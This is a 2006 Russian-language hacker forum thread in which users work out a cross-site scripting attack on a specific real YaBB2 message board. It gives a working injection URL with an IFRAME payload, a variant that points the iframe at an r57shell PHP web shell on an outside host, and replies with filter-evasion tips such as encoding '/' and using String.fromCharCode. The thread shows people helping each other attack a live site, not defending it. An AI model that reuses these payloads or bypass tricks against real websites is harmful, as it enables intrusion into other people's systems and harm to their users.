XSS на Yabb2 Rc1

$n@ke · 10 Dec 2006

Первый раз такое, аж обидно!))но здаватся не собираюсь!

_http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

вот КСС, подставляю вместо "javascript" src, прописую путь к 57шеллу на народе

PHP:

http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Dhttp://XAK.narod.ru/r57shell.php><%252FIFRAME>

, но вылезает эррор, типа :
Символ / не может использовацца в логине!Я уж и кодировал строку, и все равно никак!
Кто то может подскажет чтонить?

zl0ba · 10 Dec 2006

/ > %2f

Ksander · 10 Dec 2006

$n@ke said:

прописую путь к 57шеллу на народе
Click to expand...

На народе нельзя, он php не поддерживает.

zl0ba · 10 Dec 2006

Ksander said:

На народе нельзя, он php не поддерживает.
Click to expand...

У него полюбому бы тогда код бы шелла высветелся, а народ, да пхп для него было бы шикарно!

$n@ke · 11 Dec 2006

2 jah

Я уж и кодировал строку
Click to expand...

нет, %2f не катит!Я ж грю.!
ну да, код бы должен был показацца!

podkashey · 11 Dec 2006

$n@ke, попробуй через String.fromCharCode - может получится... Понять о чем это можно здесь https://forum.antichat.ru/thread15709.html

XSS на Yabb2 Rc1

$n@ke Elder - Старейшина

zl0ba ПсихолоГ

Ksander Elder - Старейшина

zl0ba ПсихолоГ

$n@ke Elder - Старейшина

podkashey С крышкой по жизни!

Useful Searches

XSS на Yabb2 Rc1

$n@ke Elder - Старейшина

zl0ba ПсихолоГ

Ksander Elder - Старейшина

zl0ba ПсихолоГ

$n@ke Elder - Старейшина

podkashey С крышкой по жизни!